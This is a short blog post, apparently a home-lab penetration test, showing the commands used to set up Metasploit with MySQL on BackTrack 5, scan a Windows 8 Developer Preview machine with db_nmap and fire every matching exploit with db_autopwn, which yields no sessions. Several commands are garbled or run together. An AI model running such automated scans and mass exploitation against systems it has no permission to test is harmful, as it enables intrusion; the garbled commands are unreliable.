Wanted to see if Microsoft may have used some libraries / programs of early Windows versions that may have vulnerabilities that remote and Metesploit have an exploit for it.
For this i'am used the Metasploit db_autopwn to use all the exploits that have ports for Windows 8 Developer has opened. At the same look will be a quick and simple test.
(BT5 Configuration for R1, using Metasploit review 13 728)
Setting up MySQL
Install the Ruby gem 'mysql' :
gem install mysql-install-userStart the MySQL server :
service mysql startConnect to the MySQL server (password 'toor') :
mysql -u root -pCreate a database for Metasploit :
msf create database;You can now exit the MySQL client:
exit
Prepare Metasploit
Start at the Metasploit Console (msfconsole) :
/Pentest/exploits/framework/msfconsoleMetaploit configured to use the MySQL driver :
mysql db_driverConnecta to database 'msf' :
db_connect root:toor@localhost/msfFind out if we connect :
DB_STATUS
Make an nmap scan against the system of Windows 8. The results are automatically stored in the SPS database :
db_nmap -Pn 192.168.1.115Finally, run db_autopwn!
db_autopwn -p -t -eThe results?!
[*] The autopwn command completed with 0 sessions have
But hey, I thought it was worth trying..........
Regards
ethicalhack3r
0 comments:
Post a Comment